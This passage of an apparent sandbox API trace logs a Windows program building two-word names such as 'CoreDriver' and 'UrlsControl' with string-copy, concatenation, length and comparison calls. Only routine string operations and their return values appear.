lstrcmpA (lpString1="CharBook", lpString2="MarkTool") returned -1 [0043.606] lstrcmpA (lpString1="MarkDevice", lpString2="MarkTool") returned -1 [0043.606] lstrcmpA (lpString1="MouseByte", lpString2="MarkTool") returned 1 [0043.606] lstrcmpA (lpString1="ActiveBook", lpString2="MarkTool") returned -1 [0043.606] lstrlenA (lpString="MarkTool") returned 8 [0043.606] lstrcpyA (in: lpString1=0x2c5a095, lpString2="Core" | out: lpString1="Core") returned="Core" [0043.606] lstrcatA (in: lpString1="Core", lpString2="Driver" | out: lpString1="CoreDriver") returned="CoreDriver" [0043.606] lstrcmpA (lpString1="MarkVirtual", lpString2="CoreDriver") returned 1 [0043.606] lstrcmpA (lpString1="LineTool", lpString2="CoreDriver") returned 1 [0043.606] lstrcmpA (lpString1="ReplyType", lpString2="CoreDriver") returned 1 [0043.606] lstrcmpA (lpString1="ValueFolder", lpString2="CoreDriver") returned 1 [0043.606] lstrcmpA (lpString1="BlackFolder", lpString2="CoreDriver") returned -1 [0043.606] lstrcmpA (lpString1="CharBook", lpString2="CoreDriver") returned -1 [0043.606] lstrcmpA (lpString1="MarkDevice", lpString2="CoreDriver") returned 1 [0043.606] lstrcmpA (lpString1="MouseByte", lpString2="CoreDriver") returned 1 [0043.607] lstrcmpA (lpString1="ActiveBook", lpString2="CoreDriver") returned -1 [0043.607] lstrcmpA (lpString1="MarkTool", lpString2="CoreDriver") returned 1 [0043.607] lstrlenA (lpString="CoreDriver") returned 10 [0043.607] lstrcpyA (in: lpString1=0x2c5a0a0, lpString2="Junk" | out: lpString1="Junk") returned="Junk" [0043.607] lstrcatA (in: lpString1="Junk", lpString2="Virtual" | out: lpString1="JunkVirtual") returned="JunkVirtual" [0043.607] lstrcmpA (lpString1="MarkVirtual", lpString2="JunkVirtual") returned 1 [0043.607] lstrcmpA (lpString1="LineTool", lpString2="JunkVirtual") returned 1 [0043.607] lstrcmpA (lpString1="ReplyType", lpString2="JunkVirtual") returned 1 [0043.607] lstrcmpA (lpString1="ValueFolder", lpString2="JunkVirtual") returned 1 [0043.607] lstrcmpA (lpString1="BlackFolder", lpString2="JunkVirtual") returned -1 [0043.607] lstrcmpA (lpString1="CharBook", lpString2="JunkVirtual") returned -1 [0043.607] lstrcmpA (lpString1="MarkDevice", lpString2="JunkVirtual") returned 1 [0043.607] lstrcmpA (lpString1="MouseByte", lpString2="JunkVirtual") returned 1 [0043.607] lstrcmpA (lpString1="ActiveBook", lpString2="JunkVirtual") returned -1 [0043.607] lstrcmpA (lpString1="MarkTool", lpString2="JunkVirtual") returned 1 [0043.607] lstrcmpA (lpString1="CoreDriver", lpString2="JunkVirtual") returned -1 [0043.607] lstrlenA (lpString="JunkVirtual") returned 11 [0043.607] lstrcpyA (in: lpString1=0x2c5a0ac, lpString2="Link" | out: lpString1="Link") returned="Link" [0043.607] lstrcatA (in: lpString1="Link", lpString2="Stop" | out: lpString1="LinkStop") returned="LinkStop" [0043.607] lstrcmpA (lpString1="MarkVirtual", lpString2="LinkStop") returned 1 [0043.607] lstrcmpA (lpString1="LineTool", lpString2="LinkStop") returned -1 [0043.607] lstrcmpA (lpString1="ReplyType", lpString2="LinkStop") returned 1 [0043.607] lstrcmpA (lpString1="ValueFolder", lpString2="LinkStop") returned 1 [0043.607] lstrcmpA (lpString1="BlackFolder", lpString2="LinkStop") returned -1 [0043.607] lstrcmpA (lpString1="CharBook", lpString2="LinkStop") returned -1 [0043.607] lstrcmpA (lpString1="MarkDevice", lpString2="LinkStop") returned 1 [0043.607] lstrcmpA (lpString1="MouseByte", lpString2="LinkStop") returned 1 [0043.608] lstrcmpA (lpString1="ActiveBook", lpString2="LinkStop") returned -1 [0043.608] lstrcmpA (lpString1="MarkTool", lpString2="LinkStop") returned 1 [0043.608] lstrcmpA (lpString1="CoreDriver", lpString2="LinkStop") returned -1 [0043.608] lstrcmpA (lpString1="JunkVirtual", lpString2="LinkStop") returned -1 [0043.608] lstrlenA (lpString="LinkStop") returned 8 [0043.608] lstrcpyA (in: lpString1=0x2c5a0b5, lpString2="Folder" | out: lpString1="Folder") returned="Folder" [0043.608] lstrcatA (in: lpString1="Folder", lpString2="Device" | out: lpString1="FolderDevice") returned="FolderDevice" [0043.608] lstrcmpA (lpString1="MarkVirtual", lpString2="FolderDevice") returned 1 [0043.608] lstrcmpA (lpString1="LineTool", lpString2="FolderDevice") returned 1 [0043.608] lstrcmpA (lpString1="ReplyType", lpString2="FolderDevice") returned 1 [0043.608] lstrcmpA (lpString1="ValueFolder", lpString2="FolderDevice") returned 1 [0043.608] lstrcmpA (lpString1="BlackFolder", lpString2="FolderDevice") returned -1 [0043.608] lstrcmpA (lpString1="CharBook", lpString2="FolderDevice") returned -1 [0043.608] lstrcmpA (lpString1="MarkDevice", lpString2="FolderDevice") returned 1 [0043.608] lstrcmpA (lpString1="MouseByte", lpString2="FolderDevice") returned 1 [0043.608] lstrcmpA (lpString1="ActiveBook", lpString2="FolderDevice") returned -1 [0043.608] lstrcmpA (lpString1="MarkTool", lpString2="FolderDevice") returned 1 [0043.608] lstrcmpA (lpString1="CoreDriver", lpString2="FolderDevice") returned -1 [0043.608] lstrcmpA (lpString1="JunkVirtual", lpString2="FolderDevice") returned 1 [0043.608] lstrcmpA (lpString1="LinkStop", lpString2="FolderDevice") returned 1 [0043.608] lstrlenA (lpString="FolderDevice") returned 12 [0043.608] lstrcpyA (in: lpString1=0x2c5a0c2, lpString2="Thread" | out: lpString1="Thread") returned="Thread" [0043.608] lstrcatA (in: lpString1="Thread", lpString2="Active" | out: lpString1="ThreadActive") returned="ThreadActive" [0043.608] lstrcmpA (lpString1="MarkVirtual", lpString2="ThreadActive") returned -1 [0043.608] lstrcmpA (lpString1="LineTool", lpString2="ThreadActive") returned -1 [0043.608] lstrcmpA (lpString1="ReplyType", lpString2="ThreadActive") returned -1 [0043.608] lstrcmpA (lpString1="ValueFolder", lpString2="ThreadActive") returned 1 [0043.608] lstrcmpA (lpString1="BlackFolder", lpString2="ThreadActive") returned -1 [0043.609] lstrcmpA (lpString1="CharBook", lpString2="ThreadActive") returned -1 [0043.609] lstrcmpA (lpString1="MarkDevice", lpString2="ThreadActive") returned -1 [0043.609] lstrcmpA (lpString1="MouseByte", lpString2="ThreadActive") returned -1 [0043.609] lstrcmpA (lpString1="ActiveBook", lpString2="ThreadActive") returned -1 [0043.609] lstrcmpA (lpString1="MarkTool", lpString2="ThreadActive") returned -1 [0043.609] lstrcmpA (lpString1="CoreDriver", lpString2="ThreadActive") returned -1 [0043.609] lstrcmpA (lpString1="JunkVirtual", lpString2="ThreadActive") returned -1 [0043.609] lstrcmpA (lpString1="LinkStop", lpString2="ThreadActive") returned -1 [0043.609] lstrcmpA (lpString1="FolderDevice", lpString2="ThreadActive") returned -1 [0043.609] lstrlenA (lpString="ThreadActive") returned 12 [0043.609] lstrcpyA (in: lpString1=0x2c5a0cf, lpString2="Mouse" | out: lpString1="Mouse") returned="Mouse" [0043.609] lstrcatA (in: lpString1="Mouse", lpString2="Tool" | out: lpString1="MouseTool") returned="MouseTool" [0043.609] lstrcmpA (lpString1="MarkVirtual", lpString2="MouseTool") returned -1 [0043.609] lstrcmpA (lpString1="LineTool", lpString2="MouseTool") returned -1 [0043.609] lstrcmpA (lpString1="ReplyType", lpString2="MouseTool") returned 1 [0043.609] lstrcmpA (lpString1="ValueFolder", lpString2="MouseTool") returned 1 [0043.609] lstrcmpA (lpString1="BlackFolder", lpString2="MouseTool") returned -1 [0043.609] lstrcmpA (lpString1="CharBook", lpString2="MouseTool") returned -1 [0043.609] lstrcmpA (lpString1="MarkDevice", lpString2="MouseTool") returned -1 [0043.609] lstrcmpA (lpString1="MouseByte", lpString2="MouseTool") returned -1 [0043.609] lstrcmpA (lpString1="ActiveBook", lpString2="MouseTool") returned -1 [0043.609] lstrcmpA (lpString1="MarkTool", lpString2="MouseTool") returned -1 [0043.609] lstrcmpA (lpString1="CoreDriver", lpString2="MouseTool") returned -1 [0043.609] lstrcmpA (lpString1="JunkVirtual", lpString2="MouseTool") returned -1 [0043.609] lstrcmpA (lpString1="LinkStop", lpString2="MouseTool") returned -1 [0043.609] lstrcmpA (lpString1="FolderDevice", lpString2="MouseTool") returned -1 [0043.609] lstrcmpA (lpString1="ThreadActive", lpString2="MouseTool") returned 1 [0043.609] lstrlenA (lpString="MouseTool") returned 9 [0043.610] lstrcpyA (in: lpString1=0x2c5a0d9, lpString2="Char" | out: lpString1="Char") returned="Char" [0043.610] lstrcatA (in: lpString1="Char", lpString2="Stop" | out: lpString1="CharStop") returned="CharStop" [0043.610] lstrcmpA (lpString1="MarkVirtual", lpString2="CharStop") returned 1 [0043.610] lstrcmpA (lpString1="LineTool", lpString2="CharStop") returned 1 [0043.610] lstrcmpA (lpString1="ReplyType", lpString2="CharStop") returned 1 [0043.610] lstrcmpA (lpString1="ValueFolder", lpString2="CharStop") returned 1 [0043.610] lstrcmpA (lpString1="BlackFolder", lpString2="CharStop") returned -1 [0043.610] lstrcmpA (lpString1="CharBook", lpString2="CharStop") returned -1 [0043.610] lstrcmpA (lpString1="MarkDevice", lpString2="CharStop") returned 1 [0043.610] lstrcmpA (lpString1="MouseByte", lpString2="CharStop") returned 1 [0043.610] lstrcmpA (lpString1="ActiveBook", lpString2="CharStop") returned -1 [0043.610] lstrcmpA (lpString1="MarkTool", lpString2="CharStop") returned 1 [0043.610] lstrcmpA (lpString1="CoreDriver", lpString2="CharStop") returned 1 [0043.610] lstrcmpA (lpString1="JunkVirtual", lpString2="CharStop") returned 1 [0043.610] lstrcmpA (lpString1="LinkStop", lpString2="CharStop") returned 1 [0043.610] lstrcmpA (lpString1="FolderDevice", lpString2="CharStop") returned 1 [0043.610] lstrcmpA (lpString1="ThreadActive", lpString2="CharStop") returned 1 [0043.610] lstrcmpA (lpString1="MouseTool", lpString2="CharStop") returned 1 [0043.610] lstrlenA (lpString="CharStop") returned 8 [0043.610] lstrcpyA (in: lpString1=0x2c5a0e2, lpString2="Mark" | out: lpString1="Mark") returned="Mark" [0043.610] lstrcatA (in: lpString1="Mark", lpString2="Active" | out: lpString1="MarkActive") returned="MarkActive" [0043.610] lstrcmpA (lpString1="MarkVirtual", lpString2="MarkActive") returned 1 [0043.610] lstrcmpA (lpString1="LineTool", lpString2="MarkActive") returned -1 [0043.610] lstrcmpA (lpString1="ReplyType", lpString2="MarkActive") returned 1 [0043.610] lstrcmpA (lpString1="ValueFolder", lpString2="MarkActive") returned 1 [0043.610] lstrcmpA (lpString1="BlackFolder", lpString2="MarkActive") returned -1 [0043.610] lstrcmpA (lpString1="CharBook", lpString2="MarkActive") returned -1 [0043.611] lstrcmpA (lpString1="MarkDevice", lpString2="MarkActive") returned 1 [0043.611] lstrcmpA (lpString1="MouseByte", lpString2="MarkActive") returned 1 [0043.611] lstrcmpA (lpString1="ActiveBook", lpString2="MarkActive") returned -1 [0043.611] lstrcmpA (lpString1="MarkTool", lpString2="MarkActive") returned 1 [0043.611] lstrcmpA (lpString1="CoreDriver", lpString2="MarkActive") returned -1 [0043.611] lstrcmpA (lpString1="JunkVirtual", lpString2="MarkActive") returned -1 [0043.611] lstrcmpA (lpString1="LinkStop", lpString2="MarkActive") returned -1 [0043.611] lstrcmpA (lpString1="FolderDevice", lpString2="MarkActive") returned -1 [0043.611] lstrcmpA (lpString1="ThreadActive", lpString2="MarkActive") returned 1 [0043.611] lstrcmpA (lpString1="MouseTool", lpString2="MarkActive") returned 1 [0043.611] lstrcmpA (lpString1="CharStop", lpString2="MarkActive") returned -1 [0043.611] lstrlenA (lpString="MarkActive") returned 10 [0043.611] lstrcpyA (in: lpString1=0x2c5a0ed, lpString2="Util" | out: lpString1="Util") returned="Util" [0043.611] lstrcatA (in: lpString1="Util", lpString2="Thread" | out: lpString1="UtilThread") returned="UtilThread" [0043.611] lstrcmpA (lpString1="MarkVirtual", lpString2="UtilThread") returned -1 [0043.611] lstrcmpA (lpString1="LineTool", lpString2="UtilThread") returned -1 [0043.611] lstrcmpA (lpString1="ReplyType", lpString2="UtilThread") returned -1 [0043.611] lstrcmpA (lpString1="ValueFolder", lpString2="UtilThread") returned 1 [0043.611] lstrcmpA (lpString1="BlackFolder", lpString2="UtilThread") returned -1 [0043.611] lstrcmpA (lpString1="CharBook", lpString2="UtilThread") returned -1 [0043.611] lstrcmpA (lpString1="MarkDevice", lpString2="UtilThread") returned -1 [0043.611] lstrcmpA (lpString1="MouseByte", lpString2="UtilThread") returned -1 [0043.611] lstrcmpA (lpString1="ActiveBook", lpString2="UtilThread") returned -1 [0043.611] lstrcmpA (lpString1="MarkTool", lpString2="UtilThread") returned -1 [0043.611] lstrcmpA (lpString1="CoreDriver", lpString2="UtilThread") returned -1 [0043.611] lstrcmpA (lpString1="JunkVirtual", lpString2="UtilThread") returned -1 [0043.611] lstrcmpA (lpString1="LinkStop", lpString2="UtilThread") returned -1 [0043.611] lstrcmpA (lpString1="FolderDevice", lpString2="UtilThread") returned -1 [0043.612] lstrcmpA (lpString1="ThreadActive", lpString2="UtilThread") returned -1 [0043.612] lstrcmpA (lpString1="MouseTool", lpString2="UtilThread") returned -1 [0043.612] lstrcmpA (lpString1="CharStop", lpString2="UtilThread") returned -1 [0043.612] lstrcmpA (lpString1="MarkActive", lpString2="UtilThread") returned -1 [0043.612] lstrlenA (lpString="UtilThread") returned 10 [0043.612] lstrcpyA (in: lpString1=0x2c5a0f8, lpString2="Manager" | out: lpString1="Manager") returned="Manager" [0043.612] lstrcatA (in: lpString1="Manager", lpString2="Stop" | out: lpString1="ManagerStop") returned="ManagerStop" [0043.612] lstrcmpA (lpString1="MarkVirtual", lpString2="ManagerStop") returned 1 [0043.612] lstrcmpA (lpString1="LineTool", lpString2="ManagerStop") returned -1 [0043.612] lstrcmpA (lpString1="ReplyType", lpString2="ManagerStop") returned 1 [0043.612] lstrcmpA (lpString1="ValueFolder", lpString2="ManagerStop") returned 1 [0043.612] lstrcmpA (lpString1="BlackFolder", lpString2="ManagerStop") returned -1 [0043.612] lstrcmpA (lpString1="CharBook", lpString2="ManagerStop") returned -1 [0043.612] lstrcmpA (lpString1="MarkDevice", lpString2="ManagerStop") returned 1 [0043.612] lstrcmpA (lpString1="MouseByte", lpString2="ManagerStop") returned 1 [0043.612] lstrcmpA (lpString1="ActiveBook", lpString2="ManagerStop") returned -1 [0043.612] lstrcmpA (lpString1="MarkTool", lpString2="ManagerStop") returned 1 [0043.612] lstrcmpA (lpString1="CoreDriver", lpString2="ManagerStop") returned -1 [0043.612] lstrcmpA (lpString1="JunkVirtual", lpString2="ManagerStop") returned -1 [0043.612] lstrcmpA (lpString1="LinkStop", lpString2="ManagerStop") returned -1 [0043.612] lstrcmpA (lpString1="FolderDevice", lpString2="ManagerStop") returned -1 [0043.612] lstrcmpA (lpString1="ThreadActive", lpString2="ManagerStop") returned 1 [0043.612] lstrcmpA (lpString1="MouseTool", lpString2="ManagerStop") returned 1 [0043.612] lstrcmpA (lpString1="CharStop", lpString2="ManagerStop") returned -1 [0043.612] lstrcmpA (lpString1="MarkActive", lpString2="ManagerStop") returned 1 [0043.612] lstrcmpA (lpString1="UtilThread", lpString2="ManagerStop") returned 1 [0043.613] lstrlenA (lpString="ManagerStop") returned 11 [0043.613] lstrcpyA (in: lpString1=0x2c5a104, lpString2="Line" | out: lpString1="Line") returned="Line" [0043.613] lstrcatA (in: lpString1="Line", lpString2="Check" | out: lpString1="LineCheck") returned="LineCheck" [0043.613] lstrcmpA (lpString1="MarkVirtual", lpString2="LineCheck") returned 1 [0043.613] lstrcmpA (lpString1="LineTool", lpString2="LineCheck") returned 1 [0043.613] lstrcmpA (lpString1="ReplyType", lpString2="LineCheck") returned 1 [0043.613] lstrcmpA (lpString1="ValueFolder", lpString2="LineCheck") returned 1 [0043.613] lstrcmpA (lpString1="BlackFolder", lpString2="LineCheck") returned -1 [0043.613] lstrcmpA (lpString1="CharBook", lpString2="LineCheck") returned -1 [0043.613] lstrcmpA (lpString1="MarkDevice", lpString2="LineCheck") returned 1 [0043.613] lstrcmpA (lpString1="MouseByte", lpString2="LineCheck") returned 1 [0043.613] lstrcmpA (lpString1="ActiveBook", lpString2="LineCheck") returned -1 [0043.613] lstrcmpA (lpString1="MarkTool", lpString2="LineCheck") returned 1 [0043.613] lstrcmpA (lpString1="CoreDriver", lpString2="LineCheck") returned -1 [0043.613] lstrcmpA (lpString1="JunkVirtual", lpString2="LineCheck") returned -1 [0043.613] lstrcmpA (lpString1="LinkStop", lpString2="LineCheck") returned 1 [0043.613] lstrcmpA (lpString1="FolderDevice", lpString2="LineCheck") returned -1 [0043.613] lstrcmpA (lpString1="ThreadActive", lpString2="LineCheck") returned 1 [0043.613] lstrcmpA (lpString1="MouseTool", lpString2="LineCheck") returned 1 [0043.613] lstrcmpA (lpString1="CharStop", lpString2="LineCheck") returned -1 [0043.613] lstrcmpA (lpString1="MarkActive", lpString2="LineCheck") returned 1 [0043.613] lstrcmpA (lpString1="UtilThread", lpString2="LineCheck") returned 1 [0043.613] lstrcmpA (lpString1="ManagerStop", lpString2="LineCheck") returned 1 [0043.613] lstrlenA (lpString="LineCheck") returned 9 [0043.613] lstrcpyA (in: lpString1=0x2c5a10e, lpString2="List" | out: lpString1="List") returned="List" [0043.613] lstrcatA (in: lpString1="List", lpString2="Make" | out: lpString1="ListMake") returned="ListMake" [0043.613] lstrcmpA (lpString1="MarkVirtual", lpString2="ListMake") returned 1 [0043.613] lstrcmpA (lpString1="LineTool", lpString2="ListMake") returned -1 [0043.614] lstrcmpA (lpString1="ReplyType", lpString2="ListMake") returned 1 [0043.614] lstrcmpA (lpString1="ValueFolder", lpString2="ListMake") returned 1 [0043.614] lstrcmpA (lpString1="BlackFolder", lpString2="ListMake") returned -1 [0043.614] lstrcmpA (lpString1="CharBook", lpString2="ListMake") returned -1 [0043.614] lstrcmpA (lpString1="MarkDevice", lpString2="ListMake") returned 1 [0043.614] lstrcmpA (lpString1="MouseByte", lpString2="ListMake") returned 1 [0043.614] lstrcmpA (lpString1="ActiveBook", lpString2="ListMake") returned -1 [0043.614] lstrcmpA (lpString1="MarkTool", lpString2="ListMake") returned 1 [0043.614] lstrcmpA (lpString1="CoreDriver", lpString2="ListMake") returned -1 [0043.614] lstrcmpA (lpString1="JunkVirtual", lpString2="ListMake") returned -1 [0043.614] lstrcmpA (lpString1="LinkStop", lpString2="ListMake") returned -1 [0043.614] lstrcmpA (lpString1="FolderDevice", lpString2="ListMake") returned -1 [0043.614] lstrcmpA (lpString1="ThreadActive", lpString2="ListMake") returned 1 [0043.614] lstrcmpA (lpString1="MouseTool", lpString2="ListMake") returned 1 [0043.614] lstrcmpA (lpString1="CharStop", lpString2="ListMake") returned -1 [0043.614] lstrcmpA (lpString1="MarkActive", lpString2="ListMake") returned 1 [0043.614] lstrcmpA (lpString1="UtilThread", lpString2="ListMake") returned 1 [0043.614] lstrcmpA (lpString1="ManagerStop", lpString2="ListMake") returned 1 [0043.614] lstrcmpA (lpString1="LineCheck", lpString2="ListMake") returned -1 [0043.614] lstrlenA (lpString="ListMake") returned 8 [0043.614] lstrcpyA (in: lpString1=0x2c5a117, lpString2="Book" | out: lpString1="Book") returned="Book" [0043.614] lstrcatA (in: lpString1="Book", lpString2="Line" | out: lpString1="BookLine") returned="BookLine" [0043.614] lstrcmpA (lpString1="MarkVirtual", lpString2="BookLine") returned 1 [0043.614] lstrcmpA (lpString1="LineTool", lpString2="BookLine") returned 1 [0043.614] lstrcmpA (lpString1="ReplyType", lpString2="BookLine") returned 1 [0043.614] lstrcmpA (lpString1="ValueFolder", lpString2="BookLine") returned 1 [0043.615] lstrcmpA (lpString1="BlackFolder", lpString2="BookLine") returned -1 [0043.615] lstrcmpA (lpString1="CharBook", lpString2="BookLine") returned 1 [0043.615] lstrcmpA (lpString1="MarkDevice", lpString2="BookLine") returned 1 [0043.615] lstrcmpA (lpString1="MouseByte", lpString2="BookLine") returned 1 [0043.615] lstrcmpA (lpString1="ActiveBook", lpString2="BookLine") returned -1 [0043.615] lstrcmpA (lpString1="MarkTool", lpString2="BookLine") returned 1 [0043.615] lstrcmpA (lpString1="CoreDriver", lpString2="BookLine") returned 1 [0043.615] lstrcmpA (lpString1="JunkVirtual", lpString2="BookLine") returned 1 [0043.615] lstrcmpA (lpString1="LinkStop", lpString2="BookLine") returned 1 [0043.615] lstrcmpA (lpString1="FolderDevice", lpString2="BookLine") returned 1 [0043.615] lstrcmpA (lpString1="ThreadActive", lpString2="BookLine") returned 1 [0043.615] lstrcmpA (lpString1="MouseTool", lpString2="BookLine") returned 1 [0043.615] lstrcmpA (lpString1="CharStop", lpString2="BookLine") returned 1 [0043.615] lstrcmpA (lpString1="MarkActive", lpString2="BookLine") returned 1 [0043.615] lstrlenA (lpString="BookLine") returned 8 [0043.615] lstrcpyA (in: lpString1=0x2c5a120, lpString2="Byte" | out: lpString1="Byte") returned="Byte" [0043.615] lstrcatA (in: lpString1="Byte", lpString2="Service" | out: lpString1="ByteService") returned="ByteService" [0043.615] lstrlenA (lpString="ByteService") returned 11 [0043.615] lstrcpyA (in: lpString1=0x2c5a12c, lpString2="Mirrow" | out: lpString1="Mirrow") returned="Mirrow" [0043.615] lstrcatA (in: lpString1="Mirrow", lpString2="Byte" | out: lpString1="MirrowByte") returned="MirrowByte" [0043.616] lstrlenA (lpString="MirrowByte") returned 10 [0043.616] lstrcpyA (in: lpString1=0x2c5a137, lpString2="Pack" | out: lpString1="Pack") returned="Pack" [0043.616] lstrcatA (in: lpString1="Pack", lpString2="Name" | out: lpString1="PackName") returned="PackName" [0043.616] lstrlenA (lpString="PackName") returned 8 [0043.616] lstrcpyA (in: lpString1=0x2c5a140, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0043.616] lstrcatA (in: lpString1="Settings", lpString2="Test" | out: lpString1="SettingsTest") returned="SettingsTest" [0043.616] lstrlenA (lpString="SettingsTest") returned 12 [0043.616] lstrcpyA (in: lpString1=0x2c5a14d, lpString2="Collision" | out: lpString1="Collision") returned="Collision" [0043.616] lstrcatA (in: lpString1="Collision", lpString2="Active" | out: lpString1="CollisionActive") returned="CollisionActive" [0043.616] lstrlenA (lpString="CollisionActive") returned 15 [0043.616] lstrcpyA (in: lpString1=0x2c5a15d, lpString2="Process" | out: lpString1="Process") returned="Process" [0043.616] lstrcatA (in: lpString1="Process", lpString2="Util" | out: lpString1="ProcessUtil") returned="ProcessUtil" [0043.616] lstrlenA (lpString="ProcessUtil") returned 11 [0043.616] lstrcpyA (in: lpString1=0x2c5a169, lpString2="Black" | out: lpString1="Black") returned="Black" [0043.616] lstrcatA (in: lpString1="Black", lpString2="Mode" | out: lpString1="BlackMode") returned="BlackMode" [0043.617] lstrlenA (lpString="BlackMode") returned 9 [0043.617] lstrcpyA (in: lpString1=0x2c5a173, lpString2="Start" | out: lpString1="Start") returned="Start" [0043.617] lstrcatA (in: lpString1="Start", lpString2="Operation" | out: lpString1="StartOperation") returned="StartOperation" [0043.617] lstrlenA (lpString="StartOperation") returned 14 [0043.617] lstrcpyA (in: lpString1=0x2c5a182, lpString2="Time" | out: lpString1="Time") returned="Time" [0043.617] lstrcatA (in: lpString1="Time", lpString2="Return" | out: lpString1="TimeReturn") returned="TimeReturn" [0043.617] lstrlenA (lpString="TimeReturn") returned 10 [0043.617] lstrcpyA (in: lpString1=0x2c5a18d, lpString2="Process" | out: lpString1="Process") returned="Process" [0043.617] lstrcatA (in: lpString1="Process", lpString2="File" | out: lpString1="ProcessFile") returned="ProcessFile" [0043.617] lstrlenA (lpString="ProcessFile") returned 11 [0043.617] lstrcpyA (in: lpString1=0x2c5a199, lpString2="Class" | out: lpString1="Class") returned="Class" [0043.617] lstrcatA (in: lpString1="Class", lpString2="Handler" | out: lpString1="ClassHandler") returned="ClassHandler" [0043.617] lstrlenA (lpString="ClassHandler") returned 12 [0043.617] lstrcpyA (in: lpString1=0x2c5a1a6, lpString2="Collect" | out: lpString1="Collect") returned="Collect" [0043.617] lstrcatA (in: lpString1="Collect", lpString2="Junk" | out: lpString1="CollectJunk") returned="CollectJunk" [0043.617] lstrlenA (lpString="CollectJunk") returned 11 [0043.617] lstrcpyA (in: lpString1=0x2c5a1b2, lpString2="Mask" | out: lpString1="Mask") returned="Mask" [0043.617] lstrcatA (in: lpString1="Mask", lpString2="Junk" | out: lpString1="MaskJunk") returned="MaskJunk" [0043.617] lstrlenA (lpString="MaskJunk") returned 8 [0043.617] lstrcpyA (in: lpString1=0x2c5a1bb, lpString2="White" | out: lpString1="White") returned="White" [0043.617] lstrcatA (in: lpString1="White", lpString2="Class" | out: lpString1="WhiteClass") returned="WhiteClass" [0043.617] lstrlenA (lpString="WhiteClass") returned 10 [0043.618] lstrcpyA (in: lpString1=0x2c5a1c6, lpString2="Black" | out: lpString1="Black") returned="Black" [0043.618] lstrcatA (in: lpString1="Black", lpString2="Folder" | out: lpString1="BlackFolder") returned="BlackFolder" [0043.618] lstrlenA (lpString="BlackFolder") returned 11 [0043.618] lstrcpyA (in: lpString1=0x2c5a1d2, lpString2="Folder" | out: lpString1="Folder") returned="Folder" [0043.618] lstrcatA (in: lpString1="Folder", lpString2="Time" | out: lpString1="FolderTime") returned="FolderTime" [0043.618] lstrlenA (lpString="FolderTime") returned 10 [0043.618] lstrcpyA (in: lpString1=0x2c5a1dd, lpString2="Stop" | out: lpString1="Stop") returned="Stop" [0043.618] lstrcatA (in: lpString1="Stop", lpString2="Sheet" | out: lpString1="StopSheet") returned="StopSheet" [0043.618] lstrlenA (lpString="StopSheet") returned 9 [0043.618] lstrcpyA (in: lpString1=0x2c5a1e7, lpString2="Make" | out: lpString1="Make") returned="Make" [0043.618] lstrcatA (in: lpString1="Make", lpString2="Char" | out: lpString1="MakeChar") returned="MakeChar" [0043.618] lstrlenA (lpString="MakeChar") returned 8 [0043.618] lstrcpyA (in: lpString1=0x2c5a1f0, lpString2="Sheet" | out: lpString1="Sheet") returned="Sheet" [0043.618] lstrcatA (in: lpString1="Sheet", lpString2="Byte" | out: lpString1="SheetByte") returned="SheetByte" [0043.618] lstrlenA (lpString="SheetByte") returned 9 [0043.618] lstrcpyA (in: lpString1=0x2c5a1fa, lpString2="Mouse" | out: lpString1="Mouse") returned="Mouse" [0043.618] lstrcatA (in: lpString1="Mouse", lpString2="Return" | out: lpString1="MouseReturn") returned="MouseReturn" [0043.618] lstrlenA (lpString="MouseReturn") returned 11 [0043.618] lstrcpyA (in: lpString1=0x2c5a206, lpString2="Text" | out: lpString1="Text") returned="Text" [0043.618] lstrcatA (in: lpString1="Text", lpString2="Check" | out: lpString1="TextCheck") returned="TextCheck" [0043.618] lstrlenA (lpString="TextCheck") returned 9 [0043.618] lstrcpyA (in: lpString1=0x2c5a210, lpString2="Check" | out: lpString1="Check") returned="Check" [0043.618] lstrcatA (in: lpString1="Check", lpString2="Make" | out: lpString1="CheckMake") returned="CheckMake" [0043.618] lstrlenA (lpString="CheckMake") returned 9 [0043.618] lstrcpyA (in: lpString1=0x2c5a21a, lpString2="Mirrow" | out: lpString1="Mirrow") returned="Mirrow" [0043.618] lstrcatA (in: lpString1="Mirrow", lpString2="Mouse" | out: lpString1="MirrowMouse") returned="MirrowMouse" [0043.619] lstrlenA (lpString="MirrowMouse") returned 11 [0043.619] lstrcpyA (in: lpString1=0x2c5a226, lpString2="Pack" | out: lpString1="Pack") returned="Pack" [0043.619] lstrcatA (in: lpString1="Pack", lpString2="Process" | out: lpString1="PackProcess") returned="PackProcess" [0043.619] lstrlenA (lpString="PackProcess") returned 11 [0043.619] lstrcpyA (in: lpString1=0x2c5a232, lpString2="Urls" | out: lpString1="Urls") returned="Urls" [0043.619] lstrcatA (in: lpString1="Urls", lpString2="Control" | out: lpString1="UrlsControl") returned="UrlsControl" [0043.619] lstrlenA (lpString="UrlsControl") returned 11 [0043.619] lstrcpyA (in: lpString1=0x2c5a23e, lpString2="Collision" | out: lpString1="Collision") returned="Collision" [0043.619] lstrcatA (in: lpString1="Collision", lpString2="Collision" | out: lpString1="CollisionCollision") returned="CollisionCollision" [0043.619] lstrlenA (lpString="CollisionCollision") returned 18 [0043.619] lstrcpyA (in: lpString1=0x2c5a251, lpString2="Stop" | out: lpString1="Stop") returned="Stop" [0043.619] lstrcatA (in: lpString1="Stop", lpString2="Paper" | out: lpString1="StopPaper") returned="StopPaper" [0043.619] lstrlenA (lpString="StopPaper") returned 9 [0043.619] lstrcpyA (in: lpString1=0x2c5a25b, lpString2="Mirrow" | out: lpString1="Mirrow") returned="Mirrow" [0043.619] lstrcatA (in: lpString1="Mirrow", lpString2="Local" | out: lpString1="MirrowLocal") returned="MirrowLocal" [0043.619] lstrlenA (lpString="MirrowLocal") returned 11 [0043.619] lstrcpyA (in: lpString1=0x2c5a267, lpString2="Return" | out: lpString1="Return") returned="Return" [0043.619] lstrcatA (in: lpString1="Return", lpString2="Operator" | out: lpString1="ReturnOperator") returned="ReturnOperator" [0043.619] lstrlenA (lpString="ReturnOperator") returned 14 [0043.619] lstrcpyA (in: lpString1=0x2c5a276, lpString2="File" | out: lpString1="File") returned="File" [0043.619] lstrcatA (in: lpString1="File", lpString2="Type" | out: lpString1="FileType") returned="FileType" [0043.619] lstrlenA (lpString="FileType") returned 8 [0043.619] lstrcpyA (in: lpString1=0x2c5a27f, lpString2="Urls" | out: lpString1="Urls") returned="Urls" [0043.619] lstrcatA (in: lpString1="Urls", lpString2="Util" | out: lpString1="UrlsUtil") returned="UrlsUtil" [0043.619] lstrlenA (lpString="UrlsUtil") returned 8 [0043.619] lstrcpyA (in: lpString1=0x2c5a288, lpString2="Mode" | out: lpString1="Mode") returned="Mode" [0043.620] lstrcatA (in: lpString1="Mode", lpString2="Char" 